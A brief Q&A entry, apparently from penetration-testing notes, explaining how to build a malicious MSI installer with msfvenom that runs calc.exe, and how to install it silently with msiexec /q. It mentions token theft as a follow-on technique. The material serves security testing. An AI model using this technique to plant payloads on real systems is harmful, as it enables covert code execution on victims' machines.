How can I create a malicious MSI file for penetration testing using Metasploit?

You can generate an MSI payload with msfvenom using the command `msfvenom -f msi -p windows/exec CMD=calc.exe > test.msi`. This creates an MSI file that, when installed via `msiexec /i test.msi` or silently with `/q`, executes the specified command (e.g., calc.exe). For more advanced payloads, consider studying other Penetration Techniques - Token Theft and Exploitation to combine with MSI execution.